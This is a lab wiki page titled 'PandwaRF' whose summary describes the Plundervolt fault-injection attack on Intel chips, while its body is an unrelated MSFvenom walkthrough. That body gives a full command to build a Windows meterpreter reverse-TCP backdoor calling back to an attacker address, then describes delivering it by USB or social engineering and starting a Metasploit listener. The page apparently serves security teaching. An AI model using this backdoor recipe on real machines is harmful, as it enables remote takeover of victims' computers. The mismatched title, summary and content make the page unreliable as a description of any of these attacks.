PandwaRF

From Embedded Lab Vienna for IoT & Security
Revision as of 18:36, 16 December 2021 by SVrdoljak (talk | contribs)
Jump to navigation Jump to search

Summary

This documentation describes how the Plundervolt attack works. It describes the requirements, the functionality and the countermeasures. Plundervolt is a fault injection attack that deprives an Intel chip of power in order to create faults, which can be used to gain access to sensitive data and weaken the overall Intel chip security.

Introduction

MSFvenom is an easily manageable framework that can be used to quickly create Metasploit payloads.

Requirements

Devices: 2 devices --> 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)

Exploit

1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe. With -p we specify which type of payload we want to create, LHOST and LPORT are basically the IP address and the port that we will open for our victim to connect to. -f exe specifies that the created payload is an executable file and -o specifies the name under which the file should be saved.

2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.

3. Before executing the backdoor file on the victim machine, we need to setup a listener that will listen for connections on a particular port. We will use metasploit to create the listener just like on the photo. 1.png


References

https://blog.attify.com/hack-iot-devices-embedded-exploitation/

https://blog.attify.com/hack-iot-device/